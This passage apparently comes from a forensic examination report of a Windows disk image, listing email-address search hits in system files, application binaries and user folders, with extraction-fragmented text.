sha2-nistp521-cert- agent.exe
nistp25

sha2-nistp521-cert- keygen.exe
unknown

sha2-nistp521-cert- keyscan.exe
nistp25
[email protected],«ecdsa- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe
sha2-nistp521-cert-
[email protected]«,ssh-ed25519-
cert-v0
Page 81/145
T
a
Preview Source File
g
s
[email protected] «ecdsa- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-

[email protected]« ssh-unknown onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c
nistp25 7e35c/ssh-keyscan.exe
[email protected],«ecdsa- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-
[email protected]«,ssh-ed25519- onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c
cert-v0 7e35c/ssh.exe

sha2-nistp521-cert- common-components-
[email protected]« unknownssh- onecore_31bf3856ad364e35_10.0.17763.1_none_ad6c66b207
unknown, e8c478/ssh-add.exe

[email protected]« ssh-unknown onecore_31bf3856ad364e35_10.0.17763.1_none_ad6c66b207
nistp25 e8c478/ssh-agent.exe

[email protected]« unknownssh- onecore_31bf3856ad364e35_10.0.17763.1_none_ad6c66b207
unknown e8c478/ssh-keygen.exe
[email protected]
T
a
Preview Source File
g
s
ssh.com ssh-ed25519 /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-add.exe

«ed25519ssh-ed25519-cert-
[email protected]« ed25519-cert
ssh-rs
56789+/ ssh-ed25519 /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-agent.exe

«ed25519ssh-ed25519-cert-
Page 82/145
T
a
Preview Source File
g
s
ssh-rs
bytes) ssh-ed25519 «ed25519ssh- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-

ed25519-cert ssh-rs
n_fatal ssh-ed25519 «ed25519ssh- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh.exe

[email protected]«
ed25519-cert ssh-rs
? !(ew ssh-ed25519 «ed25519ssh- /img_disk.raw/vol_vol7/Program Files/OpenSSH/sshd.exe

[email protected]«
ed25519-cert ssh-rs
ha2-512 ssh-ed25519 /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-

«ed25519ssh-ed25519-cert- add.exe
ssh-rs
56789+/ ssh-ed25519 /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-

«ed25519ssh-ed25519-cert- agent.exe
ssh-rs
bytes) ssh-ed25519 «ed25519ssh- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-

ed25519-cert ssh-rs
n_fatal ssh-ed25519 «ed25519ssh- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe

[email protected]«
ed25519-cert ssh-rs
bytes) ssh-ed25519 «ed25519ssh- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-

ed25519-cert ssh-rs onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c
Page 83/145
T
a
Preview Source File
g
s
n_fatal ssh-ed25519 «ed25519ssh- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-

ed25519-cert ssh-rs onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c
7e35c/ssh.exe
ha2-512 ssh-ed25519 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-

«ed25519ssh-ed25519-cert- common-components-
[email protected]« ed25519-cert onecore_31bf3856ad364e35_10.0.17763.1_none_ad6c66b207e
ssh-rs 8c478/ssh-add.exe
56789+/ ssh-ed25519 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-

«ed25519ssh-ed25519-cert- common-components-
[email protected]« ed25519-cert onecore_31bf3856ad364e35_10.0.17763.1_none_ad6c66b207e
ssh-rs 8c478/ssh-agent.exe
[email protected]
T
a
Preview Source File
g
s
2016 by eemeli aro /img_disk.raw/vol_vol7/Program

<«[email protected]«> Files/WindowsApps/Microsoft.SkypeApp_14.26.95.0_x64__kzf8qxf38
\n\nprovided for i zg5c/ReactAssets/index.windows.bundle
[email protected]
T
a
Preview Source File
g
s
: einar lielmanis, /
<«[email protected]« img_disk.raw/vol_vol7/Windows/SystemApps/Microsoft.MicrosoftEdgeDe
> http://jsbeautifie vToolsClient_8wekyb3d8bbwe/23/common/monaco-
editor/min/vs/language/html/htmlWorker.js
: einar lielmanis, /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

<«[email protected]« m..oolsclient.appxmain_31bf3856ad364e35_10.0.17763.1_none_b0a211
> http://jsbeautifie 6e8181c150/htmlWorker.js
Page 84/145
T
a
Preview Source File
g
s
: einar lielmanis, /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

<«[email protected]« m..oolsclient.appxmain_31bf3856ad364e35_10.0.17763.348_none_34a7
> http://jsbeautifie b549aeff8c8c/htmlWorker.js
[email protected]
Ta
Preview Source File
gs
l tenu 2frees hared /img_disk.raw/vol_vol7/Windows/System32/winevt/Logs/Microsoft-

«[email protected]« (getinversècmap Windows-Shell-Core%4Operational.evtx-slack
%t
[email protected]
T
a
Preview Source File
g
s
-am scris pe adresa /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

ai văzut? c
-am scris pe adresa /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

ai văzut? c e7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
men vagy kerheto az /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows

«[email protected]« e- Defender/Scans/mpcache-
mail cimen. impor 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
Page 85/145
T
a
Preview Source File
g
s
men vagy kerheto az /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp

«[email protected]« e-
mail cimen. impor
men vagy kerheto az /

«[email protected]« e- img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsas
mail cimen. impor s.dmp
men vagy kerheto az /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll

mail cimen. impor
men vagy kerheto az /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll

mail cimen. impor
men vagy kerheto az /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-

«[email protected]« e- windows-crypt32-
mail cimen. impor dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/cryp
t32.dll
men vagy kerheto az /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-

«[email protected]« e- windows-crypt32-
mail cimen. impor dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/cry
pt32.dll
[email protected]
T
a
Preview Source File
g
s
email" /
placeholder="«email@exam img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.
ple.com«" aria-label="email" MicrosoftEdge_8wekyb3d8bbwe/AC/#!
001/MicrosoftEdge/Cache/KBBFFLP4/en-us[1].htm
Page 86/145
[email protected]
T
a
Preview Source File
g
s
onmicrosoft.com edo /img_disk.raw/vol_vol7/Program

«[email protected] Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64__
om«. zuzendu eta saiatu 8wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
[email protected]
T
a
Preview Source File
g
s
hau izan behar du: /img_disk.raw/vol_vol7/Program

crosoft.com« edo __8wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
erabiltzailea@c Shared/OFFICE16/MSOIDRES.DLL
[email protected]
T
a
Preview Source File
g
s
yb /img_disk.raw/vol_vol7/Windows/Speech_OneCore/Engines/TTS/en-
>fc;n4{8w7d42ku;*«f8i2ue US/M1033Zira.SPEECHUX.NUS
[email protected]«="x.s8i
y; h[9dgg^ô4
yb /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
>fc;n4{8w7d42ku;*«f8i2ue t..peech-en-us-
[email protected]«="x.s8i onecore_31bf3856ad364e35_10.0.17763.1_none_ecc2dbcee106498b/
y; h[9dgg^ô4 M1033Zira.SPEECHUX.NUS
Page 87/145
[email protected]
T
a
Preview Source File
g
s
2019 faisal salman /

<«[email protected]«> * img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.Micro
licensed under m softEdge_8wekyb3d8bbwe/AC/#!
001/MicrosoftEdge/Cache/Y2A6TZJV/header.3998d7b2c933bc66e920.bun
dle[1].js
[email protected]
T
a
Preview Source File
g
s
d domain isedgehtml /img_disk.raw/vol_vol7/Windows/SysWOW64/mshtml.dll

«[email protected]«modeles
sdialogsessio
d domain isedgehtml /img_disk.raw/vol_vol7/Windows/System32/mshtml.dll

«[email protected]«modeles
sdialogsessio
d domain isedgehtml /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]«modeles i..tmlrendering-
sdialogsessio legacy_31bf3856ad364e35_11.0.17763.1_none_36e978ca75598f85/ms
html.dll
d domain isedgehtml /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-

«[email protected]«modeles i..tmlrendering-
sdialogsessio legacy_31bf3856ad364e35_11.0.17763.1_none_413e231ca9ba5180/m
shtml.dll
[email protected]
Ta
Preview Source File
gs
a1 %s: ssh_msg_send «failedecdsa-sha2-nistp256-cert- /img_disk.raw/vol_vol7/Program

[email protected]«,ecdsa-sha2-nistp384 Files/OpenSSH/sshd.exe
Page 88/145
[email protected]
T
a
Preview Source File
g
s
016 heather arthur /img_disk.raw/vol_vol7/Program

<«[email protected]«>\n\ Files/WindowsApps/Microsoft.SkypeApp_14.26.95.0_x64__kzf8qxf3
npermission is h 8zg5c/ReactAssets/index.windows.bundle
[email protected]
Ta
Preview Source File
gs
thorsten leemhuis /img_disk.raw/vol_vol7/Program Files/VMware/VMware

<«[email protected]«> jon masters Tools/open_source_licenses.txt
<jcm@r
[email protected]
Ta
Preview Source File
gs
0 fernando navarro /img_disk.raw/vol_vol7/Program Files/VMware/VMware

2010
[email protected]
T
a
Preview Source File
g
s
evel mailing list. («ffmpeg- /img_disk.raw/vol_vol7/Program

[email protected]«) Files/WindowsApps/Microsoft.WebMediaExtensions_1.0.12341.0_x
c:/ba/9/s/ffmpegin 64__8wekyb3d8bbwe/avutil-56_ms.dll
[email protected]
Ta
Preview Source File
gs
thor: felix natter <«[email protected]«>, /img_disk.raw/vol_vol7/Program Files/VMware/VMware

geert kloosterman Tools/open_source_licenses.txt
Page 89/145
[email protected]
T
a
Preview Source File
g
s
ail>. eg. /img_disk.raw/vol_vol7/Windows/SysWOW64/AuthFWSnapin.dll

contosoid\«foo@contos
o.com« the online id was
n
ail>. eg. /
contosoid\«foo@contos img_disk.raw/vol_vol7/Windows/SysWOW64/en/AuthFWSnapIn.Resources
o.com« the online id was .dll
n
ail>. eg. /img_disk.raw/vol_vol7/Windows/System32/AuthFWSnapin.dll

contosoid\«foo@contos
o.com« the online id was
n
ail>. eg. /
contosoid\«foo@contos img_disk.raw/vol_vol7/Windows/System32/en/AuthFWSnapIn.Resources.d
o.com« the online id was ll
n
ail>. eg. /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_networking-mpssvc-

contosoid\«foo@contos admin.resources_31bf3856ad364e35_10.0.17763.1_en-
o.com« the online id was us_31b60561eef3039f/AuthFWSnapIn.Resources.dll
n
ail>. eg. /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_networking-mpssvc-

contosoid\«foo@contos admin_31bf3856ad364e35_10.0.17763.1_none_961817d8d9f86206/AuthF
o.com« the online id was WSnapin.dll
n
ail>. eg. /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_networking-mpssvc-

contosoid\«foo@contos admin.resources_31bf3856ad364e35_10.0.17763.1_en-
o.com« the online id was us_3c0aafb42353c59a/AuthFWSnapIn.Resources.dll
n
ail>. eg. /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_networking-mpssvc-

contosoid\«foo@contos admin_31bf3856ad364e35_10.0.17763.1_none_a06cc22b0e592401/AuthF
Page 90/145
T
a
Preview Source File
g
s
o.com« the online id was WSnapin.dll

n
[email protected]
T
a
Preview Source File
g
s
rwarded-streamlocal «forwarded- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh.exe

[email protected]«
warning: ssh server

«forwarded-
[email protected]«
connection to port
rwarded-streamlocal «forwarded- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe

[email protected]«
warning: ssh server
rwarded-streamlocal «forwarded- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-

warning: ssh server onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7
e35c/ssh.exe
[email protected]
T
a
Preview Source File
g
s
entation. o «freetype- /img_disk.raw/vol_vol7/pagefile.sys

[email protected]«
discusses
cumentation. o «freetype- /img_disk.raw/vol_vol7/Program

[email protected]« Files/WindowsApps/Microsoft.MicrosoftSolitaireCollection_4.1.5252.0_
Page 91/145
T
a
Preview Source File
g
s
discusses bu x86__8wekyb3d8bbwe/ThirdPartyNotices.txt
ntation. o «freetype- /
[email protected]« img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDrive/1
discusse 8.143.0717.0002/ThirdPartyNotices.txt
ntation. o «freetype- /
[email protected]« img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDrive/1
discusse 8.143.0717.0002_1/ThirdPartyNotices.txt
[email protected]
Ta
Preview Source File
gs
freetype: o /img_disk.raw/vol_vol7/pagefile.sys
discusses
to freetype: o /img_disk.raw/vol_vol7/Program
«[email protected]« Files/WindowsApps/Microsoft.MicrosoftSolitaireCollection_4.1.5252.0_x8
discusses ge 6__8wekyb3d8bbwe/ThirdPartyNotices.txt
reetype: o /
«[email protected]« img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDrive/18.
discusse 143.0717.0002/ThirdPartyNotices.txt
reetype: o /
«[email protected]« img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDrive/18.
discusse 143.0717.0002_1/ThirdPartyNotices.txt
[email protected]
Ta
Preview Source File
gs
hor: noah friedman /img_disk.raw/vol_vol7/Program

<«[email protected]«> created: Files/VMware/VMware Tools/open_source_licenses.txt
1993-05-1
Page 92/145
[email protected]
T
a
Preview Source File
g
s
,"author":"segment /
<«[email protected]«> img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.
","version":"3.9.0" MicrosoftEdge_8wekyb3d8bbwe/AC/#!
001/MicrosoftEdge/Cache/KBBFFLP4/analytics.min[1].js
[email protected]
T
a
Preview Source File
g
s
penssh.com fstatvfs /img_disk.raw/vol_vol7/Program Files/OpenSSH/sftp-server.exe

hardlink hardlink@o
[email protected] /img_disk.raw/vol_vol7/Program Files/OpenSSH/sftp.exe

[email protected]
[email protected] /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/sftp.exe
[email protected]
[email protected] onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e35
c/sftp.exe
[email protected]
T
a
Preview Source File
g
s
[email protected] fsync /img_disk.raw/vol_vol7/Program Files/OpenSSH/sftp-server.exe

lsetstat lsetstat@o
Page 93/145
T
a
Preview Source File
g
s

[email protected]
server supports ext
server supports ext onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e35
c/sftp.exe
[email protected]
T
a
Preview Source File
g
s
e news alla casella /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

ghisèla si
e news alla casella /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

ghisèla si e7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
2016 faisal salman /img_disk.raw/vol_vol7/Program

<«[email protected]«>\n\np Files/WindowsApps/Microsoft.SkypeApp_14.26.95.0_x64__kzf8qxf3
ermission is h 8zg5c/ReactAssets/index.windows.bundle
Page 94/145
[email protected]
T
a
Preview Source File
g
s
ntment.invitees /img_disk.raw/vol_vol7/Program
n:d}«[email protected]« Files/WindowsApps/microsoft.windowscommunicationsapps_17.9330.
hxdeviceid versiona 21365.0_x64__8wekyb3d8bbwe/HxComm.dll
[email protected]
Ta
Preview Source File
gs
13 gabriele svelto /img_disk.raw/vol_vol7/Program Files/VMware/VMware

<«[email protected]«> copying Tools/open_source_licenses.txt
and distr
[email protected]
T
a
Preview Source File
g
s
ujte nás na e-mail: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

«galerie14@tek- shared/ink/Alphabet.xml
astore.cz« (s + q + l +
ujte nás na e-mail: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«galerie14@tek- t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb
astore.cz« (s + q + l + 1e7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
.onmicrosoft.com of /img_disk.raw/vol_vol7/Program
m«. corrigeer de indel wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
Page 95/145
[email protected]
T
a
Preview Source File
g
s
de indeling hebben: /img_disk.raw/vol_vol7/Program

osoft.com« of __8wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
gebruiker@contos Shared/OFFICE16/MSOIDRES.DLL
[email protected]
Ta
Preview Source File
gs
geert kloosterman /img_disk.raw/vol_vol7/Program Files/VMware/VMware

<«[email protected]«> created: jun 21 Tools/open_source_licenses.txt
20
[email protected]
T
a
Preview Source File
g
s
q tqtq 0**4& <@)y /img_disk.raw/vol_vol7/Windows/Fonts/msyh.ttc

b@«[email protected]«.h@ 2+
+8 :@+y o oòp
q tqtq 0**4& <@)y /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

b@«[email protected]«.h@ 2+ f..type-
+8 :@+y o oòp microsoftyahei_31bf3856ad364e35_10.0.17763.1_none_2b992c158842
b695/msyh.ttc
[email protected]
T
a
Preview Source File
g
s
l. peter deutsch /img_disk.raw/vol_vol7/Program

«[email protected]« Files/WindowsApps/Microsoft.Office.OneNote_16001.10228.20003.
================== 0_x64__8wekyb3d8bbwe/resources.pri
Page 96/145
[email protected]
Ta
Preview Source File
gs
b@vr -ms.em ico.j"f «[email protected]«3 /

wa wm @s\lock _afs img_disk.raw/vol_vol7/Windows/WinSxS/ManifestCache/42
[email protected]
T
a
Preview Source File
g
s
12 grigori goronzy /img_disk.raw/vol_vol7/pagefile.sys

<«[email protected]«> * *
pe
12 grigori goronzy /img_disk.raw/vol_vol7/Program

<«[email protected]«> * * Files/WindowsApps/Microsoft.MicrosoftSolitaireCollection_4.1.5252.0_x
permission t 86__8wekyb3d8bbwe/ThirdPartyNotices.txt
12 grigori goronzy /
<«[email protected]«> * * img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDrive/1
pe 8.143.0717.0002/ThirdPartyNotices.txt
12 grigori goronzy /
<«[email protected]«> * * img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDrive/1
pe 8.143.0717.0002_1/ThirdPartyNotices.txt
[email protected]
T
a
Preview Source File
g
s
013 martin koehler, /img_disk.raw/vol_vol7/Program

«[email protected] Files/WindowsApps/Microsoft.SkypeApp_14.26.95.0_x64__kzf8q
m«\nall rights reserve xf38zg5c/ReactAssets/index.windows.bundle
Page 97/145
[email protected]
T
a
Preview Source File
g
s
rmissionsbyurlasync /img_disk.raw/vol_vol7/Program
«[email protected]« Files/WindowsApps/Microsoft.Office.OneNote_16001.10228.20003
shared document mod .0_x64__8wekyb3d8bbwe/msoimm.dll
savetolocationasync /img_disk.raw/vol_vol7/Program
«[email protected]« Files/WindowsApps/microsoft.windowscommunicationsapps_17.93
shared document mod 30.21365.0_x64__8wekyb3d8bbwe/msoimm.dll
[email protected]
Ta
Preview Source File
gs
ce circumstances to «gtk-devel- /img_disk.raw/vol_vol7/Program Files/VMware/VMware

[email protected]« d:\build\ob\bora-11 Tools/gobject-2.0.dll
ce circumstances to «gtk-devel- /img_disk.raw/vol_vol7/Program Files/VMware/VMware

[email protected]« d:\build\ob\bora-11 Tools/VMware VGAuth/gobject-2.0.dll
[email protected]
Ta
Preview Source File
gs
ut your platform to «[email protected]«. /img_disk.raw/vol_vol7/Program

thanks. glibmm__c Files/VMware/VMware Tools/glibmm-2.4.dll
[email protected]
T
a
Preview Source File
g
s
envoyez-le là : /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

! richard :
envoyez-le là : /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]« t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e7
Page 98/145
T
a
Preview Source File
g
s
! richard : da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
son adresse : /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

om«.
son adresse : /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected] t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e7da1
om«. 44/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
penssh.com hardlink /img_disk.raw/vol_vol7/Program Files/OpenSSH/sftp-server.exe

fsync fsync@openssh

[email protected] l
[email protected] s
[email protected] s onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e3
5c/sftp.exe
Page 99/145
[email protected]
T
a
Preview Source File
g
s
* thirumoorthy /img_disk.raw/vol_vol7/Windows/System32/drivers/rmcast.sys
(«[email protected].
edu«), aug 1995
* thirumoorthy /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
(«[email protected]. rmcast_31bf3856ad364e35_10.0.17763.1_none_4543b616e0146b6c/r
edu«), aug 1995 mcast.sys
[email protected]
Ta
Preview Source File
gs
e0migxmlrules texts «[email protected]«,p /

2obj`mset patter img_disk.raw/vol_vol7/Windows/WinSxS/ManifestCache/420
eca21891c0180_blobs.bin
[email protected]
T
a
Preview Source File
g
s
[email protected] «hmac- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-keyscan.exe

[email protected]«
umac-64-etm@openssh
[email protected] «hmac- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh.exe

[email protected]«
umac-64-etm@openssh
[email protected] «hmac- /img_disk.raw/vol_vol7/Program Files/OpenSSH/sshd.exe

[email protected]«
umac-64-etm@openssh
Page 100/145
T
a
Preview Source File
g
s
[email protected] «hmac- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-

umac-64-etm@openssh
[email protected] «hmac- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe

[email protected]«
umac-64-etm@openssh
[email protected] «hmac- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-

umac-64-etm@openssh onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7
e35c/ssh-keyscan.exe

umac-64-etm@openssh onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7
e35c/ssh.exe
[email protected]
T
a
Preview Source File
g
s

md5-96-etm@ope

md5-96-etm@ope

md5-96-etm@ope

md5-96-etm@ope
Page 101/145
T
a
Preview Source File
g
s
keyscan.exe

md5-96-etm@ope

[email protected]« hmac- components-
md5-96-etm@ope onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e
35c/ssh-keyscan.exe

md5-96-etm@ope onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e
35c/ssh.exe
[email protected]
T
a
Preview Source File
g
s

[email protected]«
hmac-sha2-256-etm@o

[email protected]«
hmac-sha2-256-etm@o

[email protected]«
hmac-sha2-256-etm@o

hmac-sha2-256-etm@o
Page 102/145
T
a
Preview Source File
g
s

[email protected]«
hmac-sha2-256-etm@o

hmac-sha2-256-etm@o onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7

e35c/ssh.exe
[email protected]
T
a
Preview Source File
g
s

sha1-96-etm@op
[email protected],«hmac- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh.exe

[email protected]«,umac-
[email protected]

sha1-96-etm@op

[email protected]« hmac- keyscan.exe
sha1-96-etm@op
Page 103/145
T
a
Preview Source File
g
s
[email protected],«hmac- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe
[email protected]«,umac-
[email protected]

sha1-96-etm@op onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e
35c/ssh-keyscan.exe
[email protected],«hmac- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-
[email protected]«,umac- components-
[email protected] onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e
35c/ssh.exe
[email protected]
T
a
Preview Source File
g
s
[email protected] «hmac- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-

hmac-sha2-512-etm@o

sha2-256-
[email protected]«,hmac-sha2-
512-etm@o

[email protected]«
hmac-sha2-512-etm@o

hmac-sha2-512-etm@o
Page 104/145
T
a
Preview Source File
g
s
sha2-256-
512-etm@o

sha2-256- components-
[email protected]«,hmac-sha2- onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7
512-etm@o e35c/ssh.exe
[email protected]
T
a
Preview Source File
g
s
[email protected] «hmac- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-

hmac-md5-etm@openss

sha2-512-
etm@opens

[email protected]«
hmac-md5-etm@openss

hmac-md5-etm@openss
Page 105/145
T
a
Preview Source File
g
s
sha2-512-
etm@opens

hmac-md5-etm@openss onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7
sha2-512- components-
[email protected]«,hmac-sha1- onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7
etm@opens e35c/ssh.exe
[email protected]
T
a
Preview Source File
g
s
session_id_len == 0 «hostkeys- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh.exe

[email protected]« %s:
failed to prepa
s: buffer error: %s «hostkeys- /img_disk.raw/vol_vol7/Program Files/OpenSSH/sshd.exe

[email protected]«
mm_answer_sign mm_a
session_id_len == 0 «hostkeys- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe

[email protected]« %s:
failed to prepa
session_id_len == 0 «hostkeys- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-

[email protected]« %s: components-
failed to prepa onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7
e35c/ssh.exe
Page 106/145
[email protected]
T
a
Preview Source File
g
s
etkey /img_disk.raw/vol_vol7/Windows/SysWOW64/winipcfile.dll
virmipccrypt::«hrencryptcore__nos
[email protected]«
virmdocumentipcimpl
etkey /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-
virmipccrypt::«hrencryptcore__nos windows-r..ment-client-v2-
[email protected]« core_31bf3856ad364e35_10.0.17763.1_none_5133a422fa8e31
virmdocumentipcimpl 7d/winipcfile.dll
[email protected]
T
a
Preview Source File
g
s
oaccesstoken %0d%0a /img_disk.raw/vol_vol7/Program

«[email protected]«;olx- Files/WindowsApps/microsoft.windowscommunicationsapps_17.933
mail2bug@micros 0.21365.0_x64__8wekyb3d8bbwe/Office.UI.Xaml.Hx.Mail.dll
[email protected]
Ta
Preview Source File
gs
ght zoltan herczeg /img_disk.raw/vol_vol7/Program Files/VMware/VMware

(«[email protected]«). all rights Tools/open_source_licenses.txt
reserv
[email protected]
T
a
Preview Source File
g
s
hkwe<mi6 yn'@ y9b9 /img_disk.raw/vol_vol7/Windows/Speech_OneCore/Engines/TTS/en-

<«[email protected]«;f( mi%o US/M1033Zira.SPEECHUX.NUS
s)[yb) ,eht
Page 107/145
T
a
Preview Source File
g
s
hkwe<mi6 yn'@ y9b9 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

<«[email protected]«;f( mi%o t..peech-en-us-
s)[yb) ,eht onecore_31bf3856ad364e35_10.0.17763.1_none_ecc2dbcee106498b/M103
3Zira.SPEECHUX.NUS
[email protected]
T
a
Preview Source File
g
s
jst om door te gaan /

«[email protected]« img_disk.raw/vol_vol7/Windows/System32/DriverStore/FileRepositor
01.01.2000"emne emn y/prnms002.inf_amd64_6d7ddeebcacd2a6d/Amd64/FXSRES.DLL

«[email protected]« img_disk.raw/vol_vol7/Windows/System32/spool/drivers/x64/3/FXS
01.01.2000"emne emn RES.DLL

«[email protected]« img_disk.raw/vol_vol7/Windows/WinSxS/amd64_dual_prnms002.inf
01.01.2000"emne emn _31bf3856ad364e35_10.0.17763.1_none_de4a75df21a850fc/Amd6
4/FXSRES.DLL
[email protected]
T
a
Preview Source File
g
s
<a /img_disk.raw/vol_vol7/Windows/SysWOW64/en-US/mshtml.dll.mui
href="mailto:«iepo@micros
oft.com«">iepo@microsoft.
com
ail <a /img_disk.raw/vol_vol7/Windows/System32/en-US/edgehtml.dll.mui

com
Page 108/145
T
a
Preview Source File
g
s
<a /img_disk.raw/vol_vol7/Windows/System32/en-US/mshtml.dll.mui
com
<a /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
href="mailto:«iepo@micros i..ng-legacy.resources_31bf3856ad364e35_11.0.17763.1_en-
oft.com«">iepo@microsoft. us_10cd95b58578bae4/mshtml.dll.mui
com
ail <a /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

href="mailto:«iepo@micros i..rendering.resources_31bf3856ad364e35_11.0.17763.1_en-
oft.com«">iepo@microsoft. us_319fd044c6706fc8/edgehtml.dll.mui
com
<a /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-
href="mailto:«iepo@micros i..ng-legacy.resources_31bf3856ad364e35_11.0.17763.1_en-
oft.com«">iepo@microsoft. us_1b224007b9d97cdf/mshtml.dll.mui
com
[email protected]
T
a
Preview Source File
g
s
